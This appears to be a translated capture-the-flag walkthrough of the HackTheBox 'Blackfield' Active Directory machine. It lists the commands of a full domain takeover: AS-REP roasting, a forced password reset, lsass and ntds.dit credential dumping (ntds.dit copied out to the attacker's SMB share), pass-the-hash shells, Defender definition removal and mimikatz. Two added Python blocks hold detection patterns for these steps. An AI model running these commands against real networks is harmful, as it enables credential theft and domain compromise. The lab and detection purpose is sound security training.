AD Attack Walkthrough 3
[Table of Contents]
1. CASE 5 - HTB Blackfield
# CASE 5
- HTB Blackfield
[Walkthrough steps]
1. Port check
53, 88, 135, 389, 445, 593, 636, 3268
: 53 DNS, 88 Kerberos, 389 LDAP,
135 RPC, 3268 secure LDAP, no web server
![](https://blog.kakaocdn.net/dn/bbPNXw/btrLOnu7SDH/7xE927VaMRv2x77j1cOxwk/img.png)
> Register it in /etc/hosts!
2. rpcclient (user list)
# rpcclient 192.168.137.131
# rpcclient 192.168.137.131 -U ''
![](https://blog.kakaocdn.net/dn/kLfKx/btrLLXxeN3c/ZqbeVioQwQAfy9GNCrtY30/img.png)
> Access Denied
3. SMB enum
: smbclient (standard tool)
-with no authentication-
# smbclient -L 192.168.137.131
# smbclient -L 192.168.137.131 -U ''
![](https://blog.kakaocdn.net/dn/bJFicN/btrLNpNyFoJ/i1RprGQ1kKdD90SmZ24Cj0/img.png)
> No difference in the results
: crackmapexec (pentest tool)
# crackmapexec smb 192.168.137.131 --shares
# crackmapexec smb 192.168.137.131 --shares -u ''
# crackmapexec smb 192.168.137.131 --shares -u '' -p ''
# crackmapexec smb 192.168.137.131 --shares -u 'taku'
# crackmapexec smb 192.168.137.131 --shares -u 'taku' -p ''
![](https://blog.kakaocdn.net/dn/bzZdJN/btrLLXjEsdc/znMoYowWmTyfKD9spgsXH0/img.png)
: smbclient again
# smbclient '//192.168.137.131/profiles'
![](https://blog.kakaocdn.net/dn/bxL4I6/btrLMxdYPQg/DNkvTO9zRqskLObrDvpaY0/img.png)
> When there are many results, rather than looking at them one by one,
it is better to mount the share and browse it,
and it is worth trying every entry as a username guess.
: mount
# mount -t cifs '//192.168.137.131/profiles' /mnt
# cd /mnt
# ls -al
# find .
# ls > users.list
![](https://blog.kakaocdn.net/dn/WPfYF/btrLOgbKZJT/VMWgBIaXeBPUsSkyilXhDK/img.png)
![](https://blog.kakaocdn.net/dn/R8tca/btrLMAhu6Cu/q3MX7K0gFbAlHfzTbHe0J1/img.png)
![](https://blog.kakaocdn.net/dn/zcgmi/btrLK6uUoGN/zfBmvR2TImp0Sw7PcuQcn0/img.png)
4. Kerbrute
./kerbrute userenum --dc 192.168.137.131 -d blackfield -o kerbrute_userenum.out users.list
![](https://blog.kakaocdn.net/dn/cC17lN/btrLK5peQPH/6P00jVL8Eh642LngzgT0DK/img.png)
> If DNS is set up, the --dc (location) option
does not need to be added.
![](https://blog.kakaocdn.net/dn/cpFiLK/btrLR8Yn1cE/Scxw1WQaqu6bfXoNu2oRs0/img.png)
> The Audit share seen in the forensic share contents
and the audit among the valid usernames
look related.
![](https://blog.kakaocdn.net/dn/XjhSI/btrLPcNKuCQ/gP1XLvI14N4Y0hTvSVOEn1/img.png)
> 3 usernames confirmed in total
5. Create user lists
Create users.txt & dom_users.txt
# users.txt
# cat kerbrute_userenum.out
# grep VALID kerbrute_userenum.out | awk '{print $7}'
# grep VALID kerbrute_userenum.out | awk '{print $7}' | awk -F\@ '{print $1}' > users.txt
# dom_users.txt
# grep VALID kerbrute_userenum.out | awk '{print $7}' | awk -F\@ '{print $2"\\"$1}' > dom_users.txt
![](https://blog.kakaocdn.net/dn/BS0M2/btrLR9pqBEo/JBniywkvIUYKGBctYPbJhK/img.png)
6. GetNPUsers.py
: For valid users that do not require Kerberos pre-authentication, the AS-REP hash can be extracted
# GetNPUsers.py -dc-ip 192.168.137.131 -no-pass -usersfile users.txt blackfield/
![](https://blog.kakaocdn.net/dn/EHI1B/btrLLgcWCq9/jUkDgJR17DJUhlpZKLAmb0/img.png)
7. Crack the hashes
# hashcat --example-hashes | grep krb5asrep
# hashcat --example-hashes | grep -B5 krb5asrep
# hashcat -m 18200 hash.hash /usr/share/wordlists/rockyou.txt
# hashcat -m 18200 hash.hash --show
![](https://blog.kakaocdn.net/dn/W9WzA/btrLK5peQ02/314m5g8LWkwnZnTHZHVRm0/img.png)
![](https://blog.kakaocdn.net/dn/vJn0T/btrLMzpltrV/tasnzlRdbP93GQZ7rWRu6K/img.png)
![](https://blog.kakaocdn.net/dn/blYyxC/btrLLgYk1Fb/K2KXst18McnsoKROzbvb40/img.png)
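As an added defender-side example (not code from the original post), the Python below shows what the AS-REP roasting and kerbrute enumeration of steps 4-7 look like in Windows Security event 4768 records; the log lines and their key=value layout are constructed samples, not real DC output.

```python
# Added detection example (not part of the original walkthrough): flag AS-REP
# roastable TGT requests and bulk username enumeration in Windows Security
# event 4768. Sample lines are constructed, in a simplified key=value format.
import re
from collections import defaultdict

RC4_HMAC = "0x17"  # etype of the AS-REP that hashcat mode 18200 cracks
FIELD_RE = re.compile(r"(\w+)=(\S+)")

SAMPLE_4768 = """\
ts=1601600000 EventID=4768 TargetUserName=support PreAuthType=0 TicketEncryptionType=0x17 IpAddress=10.10.14.5 Status=0x0
ts=1601600001 EventID=4768 TargetUserName=svc_backup PreAuthType=2 TicketEncryptionType=0x12 IpAddress=10.10.10.20 Status=0x0
ts=1601600002 EventID=4768 TargetUserName=audit2020 PreAuthType=0 TicketEncryptionType=0x17 IpAddress=10.10.14.5 Status=0x19
ts=1601600003 EventID=4768 TargetUserName=guest PreAuthType=0 TicketEncryptionType=0x17 IpAddress=10.10.14.5 Status=0x6
ts=1601600004 EventID=4768 TargetUserName=administrator PreAuthType=0 TicketEncryptionType=0x17 IpAddress=10.10.14.5 Status=0x19
"""

def parse(line):
    return dict(FIELD_RE.findall(line))

def asrep_roast_candidates(lines):
    """TGTs issued (Status 0x0) without pre-auth (PreAuthType 0) and RC4-encrypted:
    exactly what GetNPUsers.py harvests. Returns (user, source ip) pairs."""
    hits = []
    for ev in map(parse, lines):
        if (ev.get("EventID") == "4768" and ev.get("Status") == "0x0"
                and ev.get("PreAuthType") == "0"
                and ev.get("TicketEncryptionType") == RC4_HMAC):
            hits.append((ev["TargetUserName"], ev["IpAddress"]))
    return hits

def enumeration_sources(lines, min_users=3, window=60):
    """Source IPs that requested TGTs for >= min_users distinct names within
    `window` seconds (the burst a kerbrute userenum run leaves behind)."""
    by_ip = defaultdict(list)
    for ev in map(parse, lines):
        if ev.get("EventID") == "4768":
            by_ip[ev["IpAddress"]].append((int(ev["ts"]), ev["TargetUserName"]))
    flagged = {}
    for ip, reqs in by_ip.items():
        reqs.sort()
        for i, (t0, _) in enumerate(reqs):
            names = {u for t, u in reqs[i:] if t - t0 <= window}
            if len(names) >= min_users:
                flagged[ip] = len(names)
                break
    return flagged
```

The first function isolates the one account whose hash would reach hashcat; the second catches the enumeration that found it, which matters because pre-auth-disabled accounts only stand out once someone is already scanning for them.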
8. crackmapexec again
# crackmapexec smb 192.168.137.131 --shares -u support -p '#00^BlackKnight'
![](https://blog.kakaocdn.net/dn/E48CZ/btrLOnBVmbe/KZ6UtNPgKIQoDP5fXwBTEk/img.png)
9. mount again
# mount -t cifs -o 'username=support,password=#00^BlackKnight' //192.168.137.131/profiles /mnt
> Even if a share turns out to be empty, connecting to it
and checking is a good habit.
10. rpcclient again
# rpcclient -U support 192.168.137.131
> enumdomusers
![](https://blog.kakaocdn.net/dn/b1G99c/btrLQxRAhlE/FR2KQOvs7AoSKtmnkK7wGK/img.png)
> Copy all of them and build the list
# cat lists | awk -F'\[' '{print $2}' | awk -F '\]' '{print $1}' > users.lst
11. GetNPUsers.py again
# GetNPUsers.py -dc-ip 192.168.137.131 -no-pass -usersfile users.lst blackfield/
![](https://blog.kakaocdn.net/dn/NQU3g/btrLQmWRAan/N0Y49kaKnoVo1OCQBGtiUk/img.png)
> No newly discovered hashes!
12. BloodHound.py
https://github.com/fox-it/BloodHound.py
: Since we do not have a shell yet,
Sharphound.exe cannot be run;
what can be used instead in this situation
is bloodhound.py
![](https://blog.kakaocdn.net/dn/b6d4Ok/btrLOmbYOkW/tlwmBEOnXPf6qCgoA1z9f0/img.png)
![](https://blog.kakaocdn.net/dn/5ukc7/btrLStg4IgZ/wrV30svWokABjtgxEtogo0/img.png)
# bloodhound.py -u support -p '#00^BlackKnight' -ns 192.168.137.131 -d blackfield.local -c all
![](https://blog.kakaocdn.net/dn/bmjzOY/btrLPdskrYE/iMSRrSclOYibNmKAdDdkFk/img.png)
> It drops the output in JSON format.
# Note
To run it without the -ns flag,
the DNS server must be added to /etc/resolv.conf,
and the AD nameserver must be placed at the 'very top' for it to work properly.
![](https://blog.kakaocdn.net/dn/bg39o5/btrLLAPNb2r/FxIeKA6KNRomqBPjXkOx1k/img.png)
# bloodhound.py -u support -p '#00^BlackKnight' -d blackfield.local -c all
![](https://blog.kakaocdn.net/dn/dtXc5M/btrLLiaOGTY/ZiUyMvziIusF1G7aitdbgK/img.png)
13. BloodHound
: neo4j console > bloodhound
Add the JSON files extracted by bloodhound.py
to the BloodHound GUI, then work from there
![](https://blog.kakaocdn.net/dn/NI45v/btrLQyQuofe/YSJwjDDRP6pEOeKbBdPpTk/img.png)
![](https://blog.kakaocdn.net/dn/bmIDFF/btrLLgjJG6U/HKg93VZtHloG904DjCnUr0/img.png)
: mark user
Start by marking the support user found first
![](https://blog.kakaocdn.net/dn/HGUCH/btrLNqyVO15/sKAY4Bki4UKUWLh46h7zc0/img.png)
> If nothing notable turns up, mark another user and enumerate
> When marked as the support user,
a forced password change is possible!
![](https://blog.kakaocdn.net/dn/3eqLV/btrLMAu2yBD/3miwO9PKz3dbCGtog8DOpk/img.png)
14. rpcclient again
: Force password change
# rpcclient -U support 192.168.137.131
password : #00^BlackKnight
> setuserinfo2 Audit2020 23 'taku'
> Looking up the description of the '23' in the setuserinfo2 command above:
![](https://blog.kakaocdn.net/dn/l8gJZ/btrLStg4IfV/g82Tgkd4lW3NjjbKAKyOqK/img.png)
![](https://blog.kakaocdn.net/dn/cvXnyI/btrLPn2KLdY/yzDQJyXr7AQ2TO07IELJKk/img.png)
: run commands & check
> The first change attempt fails
because it does not meet the password complexity policy;
trying once more applies it properly
> Whether the password was actually changed
is checked with crackmapexec
# crackmapexec smb 192.168.137.131 -u Audit2020 -p taku
![](https://blog.kakaocdn.net/dn/sFQYB/btrLLgqsTRr/OkJdiSMcG7f0QNto0gt6p1/img.png)
> Once applied, new shares become accessible.
15. mount again
# mount -t cifs -o 'username=audit2020,password=taku' //192.168.137.131/forensic /mnt
![](https://blog.kakaocdn.net/dn/G7D0U/btrLLxevnpo/inyV9hoHhroNahxCWnjTXK/img.png)
![](https://blog.kakaocdn.net/dn/bW8JLQ/btrLLyLb0uw/8DK8WgMkkn2IUUMeqrQVTK/img.png)
: The notable file is lsass.zip
in the /memory_analysis folder;
lsass is where mimikatz extracts
plaintext passwords from!
![](https://blog.kakaocdn.net/dn/JT2Bw/btrLTDcW4a7/jh6AxuPmoWFAXBKKmKYYN0/img.png)
16. pypykatz
: check after unzipping
![](https://blog.kakaocdn.net/dn/V76U7/btrLLBnTuWY/MyWqXyXYhCeefjaiifm3t1/img.png)
![](https://blog.kakaocdn.net/dn/bbFqW3/btrLLyLoTNO/M7yVxrk7O9JApNbb6j65a1/img.png)
: run pypykatz
# pypykatz lsa minidump lsass.DMP
# pypykatz lsa minidump lsass.DMP > lsass.out
# less lsass.out
# grep NT lsass.out
# grep NT lsass.out -B3 | grep -i username
# grep NT lsass.out
![](https://blog.kakaocdn.net/dn/dGGYkw/btrLOlRRBIK/UrQVscwsEK8uyACAc22GzK/img.png)
![](https://blog.kakaocdn.net/dn/owX6j/btrLR8EhnVd/Tw8I5mC9FdT4iiguu71YQ0/img.png)
![](https://blog.kakaocdn.net/dn/4XzMA/btrLLy5HR8T/K4iFHvwy61kQZ3omZTNJUk/img.png)
: Save the user account NT hashes from lsass.out
![](https://blog.kakaocdn.net/dn/bwattY/btrLPcmSnoy/gsRuUbky51WHrkGR0zT3w1/img.png)
17. crackmapexec + winrm to get a shell
# crackmapexec smb 192.168.137.131 -u svc_backup -H 96~~~~~~~~~~~~~~~~~~~~~
# crackmapexec winrm 192.168.137.131 -u svc_backup -H 96~~~~~~~~~~~~~~~~~~~~~
> If (Pwn3d!) shows up, use evil-winrm
# evil-winrm -i 192.168.137.131 -u svc_backup
![](https://blog.kakaocdn.net/dn/P8wJ9/btrLMxFet2J/xkhxefZeRpsfdh2kNStCj0/img.png)
> administrator is LOGIN FAILURE
![](https://blog.kakaocdn.net/dn/HHOyP/btrLMwTToUd/J1rMiZpHUoMwtTDUKQe1vK/img.png)
> First login
18. check permissions
![](https://blog.kakaocdn.net/dn/bc8nGB/btrLLxeIugB/ff1AAeqSK9PnxPT1nVCAH1/img.png)
> SeBackupPrivilege
# SeBackupPrivilege
![](https://blog.kakaocdn.net/dn/cROMRh/btrLOnPGN9p/lZ3Hyyr3tQP02i8yQkIRyK/img.png)
> save things out of registry
![](https://blog.kakaocdn.net/dn/biAe6W/btrLLAP0BVo/rvfsNze5gLKpl6KvfRV1HK/img.png)
> read files that normally cannot be accessed
![](https://blog.kakaocdn.net/dn/EGGWb/btrLPedUoeN/Rdasq9aB84nas03zogXjT1/img.png)
> back up and restore files such as NTDS.DIT with 'wbadmin.exe' or 'diskshadow.exe'
![](https://blog.kakaocdn.net/dn/wCfDt/btrLNwe0MuF/BtHDdGEDQmX3o8RnCdfTn1/img.png)
> PoC
19. smbserver + backup files with wbadmin + Create NTFS Folder
# on Kali
# mkdir smb
# chmod 777 smb
# cd smb
# smbserver.py -smb2support -user taku -password daddy anysharenamehere $(pwd)
![](https://blog.kakaocdn.net/dn/bKyeho/btrLTWctcWY/gT7EmaMCSlvT9v2xxrwAK0/img.png)
# On Windows
# mount connection test
C:\> net use x: \\192.168.49.137\anysharenamehere /user:taku daddy
C:\> x:
C:\> dir
C:\> c:
C:\> echo Y | wbadmin start backup -backuptarget:\\192.168.49.137\anysharenamehere -include:c:\windows\ntds\
# delete the mapping if it went wrong
C:\> net use x: /delete
![](https://blog.kakaocdn.net/dn/bl5qFC/btrLLzp2iDB/eb33MldnqZmX76t9YqNPx1/img.png)
![](https://blog.kakaocdn.net/dn/ciY2ml/btrLPd68vQG/febHfwA4wsqGBJf2LdqkVK/img.png)
![](https://blog.kakaocdn.net/dn/B8RSo/btrLSve6Zj4/uUQhvyukt4VDPkM7RMCxk1/img.png)
![](https://blog.kakaocdn.net/dn/bJEaWk/btrLR76qeXs/HHfHSwxcxNaNZjJ7C3b2GK/img.png)
> Fails because the shared folder is not NTFS-formatted.
# On Kali
: Create an NTFS folder
# dd if=/dev/zero of=ntfs.disk bs=1024M count=2 (create a 2GB NTFS disk image)
# losetup -fP ntfs.disk (loopback setup)
# losetup -a
# mkfs.ntfs /dev/loop0
# mount /dev/loop0 smb/
# mount | grep smb
# cd smb/
![](https://blog.kakaocdn.net/dn/bgGyWX/btrLR7FkouT/aJKoJKmGjfa1uSjhXJRd81/img.png)
> ntfs.disk created; after mounting it,
![](https://blog.kakaocdn.net/dn/bClU5F/btrLMAhItdw/guKsHNvynEsh72FqaFTU7k/img.png)
> done
# smb conf settings
/etc/samba/smb.conf
![](https://blog.kakaocdn.net/dn/cHtJCy/btrLLyLoTNh/CGrmTmXeFL9Wjk2OSRrKnk/img.png)
![](https://blog.kakaocdn.net/dn/d4Hppy/btrLLxscfH0/CQXC9Jcx14k4MAq1uOkc11/img.png)
# on Windows
C:\> wbadmin get versions
![](https://blog.kakaocdn.net/dn/m6ReB/btrLQmJyXN8/nlVkKDK1KdypGf797J9C1k/img.png)
C:\> echo Y | wbadmin start recovery -version:10/02/2020-03:51 -itemtype:file -items:C:\Windows\ntds\ntds.dit -recoverytarget:C:\ -notrestoreacl
![](https://blog.kakaocdn.net/dn/pWyMz/btrLR8xun4Q/eadJ9Kj0w7Ts84JKGVyQh0/img.png)
![](https://blog.kakaocdn.net/dn/bwHF7g/btrLNwMQ7dU/KFJuP7ns21BR0PEydI7PRK/img.png)
![](https://blog.kakaocdn.net/dn/uKsUw/btrLQxK29ks/kCQxxz4KLFv2aL3evRJZJ0/img.png)
> Success!
20. ntds.dit crack
: ntds.dit is the AD domain database,
encrypted with the system's boot key stored in system.hive.
Grab the AD DB and the key needed to open that DB,
then extract every account's information from the DB.
C:\> reg save hklm\system system.hive
![](https://blog.kakaocdn.net/dn/bgmrHL/btrLOmJXDIg/ojktO9MverwRW9RGzz0fJk/img.png)
: secretsdump.py
# secretsdump.py -ntds ntds.dit -system system.hive LOCAL
# secretsdump.py -ntds ntds.dit -system system.hive -history LOCAL (-history dumps the password history)
![](https://blog.kakaocdn.net/dn/H6PBD/btrLLAicQrz/PQTkqz6uic6dyMgh25o7xk/img.png)
![](https://blog.kakaocdn.net/dn/DMnEe/btrLMwzyoRc/q7OG7f92N4fFlYZ5M7AX21/img.png)
> Run both commands above and compare the difference.
![](https://blog.kakaocdn.net/dn/Kdtaj/btrLLxZ04sV/j44VtwWJPfVCzzdDRCNPlk/img.png)
![](https://blog.kakaocdn.net/dn/clT7Uu/btrLNpG1xCM/MYKQuDgYtj9UZC46w2Eikk/img.png)
![](https://blog.kakaocdn.net/dn/sxBZ8/btrLTCyk9fi/3MNIn7NZ2Hcw9URr4uowkK/img.png)
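Added detection example, not part of the original walkthrough: this Python flags the chain from steps 14 and 18-20 (a forced password reset over rpcclient, wbadmin backup and recovery of ntds.dit, reg save of the SYSTEM hive) in Windows Security events 4724 and 4688. The events, their simplified key=value layout and the PASSWORD_ADMINS allowlist are assumptions made for the example.

```python
# Added detection example (not part of the original walkthrough): spot the
# SeBackupPrivilege abuse chain shown above (forced password reset, wbadmin
# backup/recovery of ntds.dit, SYSTEM hive export) in Security events 4724 and
# 4688. Sample events are constructed, simplified to key=value fields.
import re

FIELD_RE = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')  # quoted or bare values

# Command-line patterns taken from the steps above; each match names the step.
CMDLINE_RULES = [
    ("ntds backup via wbadmin", re.compile(r"wbadmin\s+start\s+backup.*\bntds\b", re.I)),
    ("ntds recovery via wbadmin", re.compile(r"wbadmin\s+start\s+recovery.*ntds\.dit", re.I)),
    ("diskshadow invocation", re.compile(r"\bdiskshadow(\.exe)?\b", re.I)),
    ("SYSTEM hive export", re.compile(r"\breg(\.exe)?\s+save\s+hklm\\system\b", re.I)),
]
# Accounts expected to reset other users' passwords (assumed allowlist).
PASSWORD_ADMINS = {"administrator"}

SAMPLE = r"""
EventID=4724 SubjectUserName=support TargetUserName=Audit2020
EventID=4724 SubjectUserName=administrator TargetUserName=jsmith
EventID=4688 SubjectUserName=svc_backup CommandLine="wbadmin start backup -backuptarget:\\10.10.14.5\share -include:c:\windows\ntds\"
EventID=4688 SubjectUserName=svc_backup CommandLine="reg save hklm\system system.hive"
EventID=4688 SubjectUserName=svc_backup CommandLine="whoami /priv"
"""

def parse(line):
    return {k: q or v for k, q, v in FIELD_RE.findall(line)}

def suspicious_resets(events):
    """4724: someone outside the allowlist resetting another account's password,
    the kind of event an rpcclient setuserinfo2 reset produces."""
    return [(e["SubjectUserName"], e["TargetUserName"]) for e in events
            if e.get("EventID") == "4724"
            and e["SubjectUserName"].lower() not in PASSWORD_ADMINS
            and e["SubjectUserName"].lower() != e["TargetUserName"].lower()]

def ntds_theft_steps(events):
    """4688: process creations whose command line matches an extraction step."""
    return [(e["SubjectUserName"], name) for e in events if e.get("EventID") == "4688"
            for name, rx in CMDLINE_RULES if rx.search(e.get("CommandLine", ""))]

def analyse(text):
    events = [parse(l) for l in text.splitlines() if l.strip()]
    return {"resets": suspicious_resets(events), "ntds": ntds_theft_steps(events)}
```

Pairing the two views matters: a lone 4724 from a helpdesk-like account is routine, but the same low-privilege account chain followed by wbadmin touching c:\windows\ntds and a reg save of HKLM\SYSTEM is the offline ntds.dit extraction this walkthrough performs.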
21. PsExec
# psexec.py -hashes NTLM:NTLM administrator@192.168.137.131
(The reason the same NTLM hash is used twice is that it is faster)
![](https://blog.kakaocdn.net/dn/bDJ5lE/btrLTUZ1pg4/sMqy22sTf8lPK2uSWvLrrk/img.png)
> We are SYSTEM, but root.txt is access denied.
![](https://blog.kakaocdn.net/dn/dyqdyV/btrLMxrIsqR/2rJJklGx7cT7280cqDu3F0/img.png)
: check the cipher info of root.txt
C:\> cipher /c root.txt
![](https://blog.kakaocdn.net/dn/St6sg/btrLNwMQ7hi/qCQ4zOukLlR5OF1e0Za5vK/img.png)
> root.txt can only be decrypted by Administrator;
we are currently SYSTEM
22. wmiexec
Used when you do not want to connect as SYSTEM
![](https://blog.kakaocdn.net/dn/pkwWl/btrLR9iS69L/SQSunaK3WIZAwXU9frcBL1/img.png)
# wmiexec.py -hashes NTLM:NTLM administrator@192.168.137.131
![](https://blog.kakaocdn.net/dn/4aB0w/btrLLiozz3S/c98WbUhgmF1QmKysCQNMB0/img.png)
> Connected as administrator, root.txt read successfully!
23. Mimikatz
: reset the hash
C:\> mimikatz.exe "lsadump::setntlm /user:Audit2020 /ntlm:600a406c~~~~~~~~~~~"
![](https://blog.kakaocdn.net/dn/bgfULy/btrLLj14mJl/I9AvKPyCnSO0bixW2kcvkk/img.png)
![](https://blog.kakaocdn.net/dn/H5cty/btrLMxrIsxy/PKErMxkRaIbWGUxviU4t70/img.png)
> Failed
![](https://blog.kakaocdn.net/dn/D31YX/btrLLgxo2PO/JJRtqWgjijYeIRWfPN2rhk/img.png)
> mimikatz has been deleted, presumably by antivirus.
: disable antivirus
C:\PROGRA~1\Windows Defender>.\mpcmdrun.exe -RemoveDefinitions -ALL
![](https://blog.kakaocdn.net/dn/bhMhHL/btrLR7L8Ryp/lpEkLBB6wjRqwCgGpcsU0k/img.png)
: re-upload mimikatz and run
> It was not antivirus after all;
the uploaded binary was simply missing,
so transfer it via SMB or PS!
C:\> mimikatz.exe "lsadump::setntlm /user:Audit2020 /ntlm:600a406c~~~~~~~~~~~"
![](https://blog.kakaocdn.net/dn/28a6G/btrLMzC5R7U/lJsYiRiVH8y5sEFfoJ3XR1/img.png)
> NTLM reset done!
: verify with crackmapexec
# crackmapexec smb 192.168.137.131 -u audit2020 -H 600a406c~~~~~~~~~~~
![](https://blog.kakaocdn.net/dn/b4bkfM/btrLLiozz2k/9FD1sKLExOQKgTNRmEyyRK/img.png)
> Confirmed applied!
End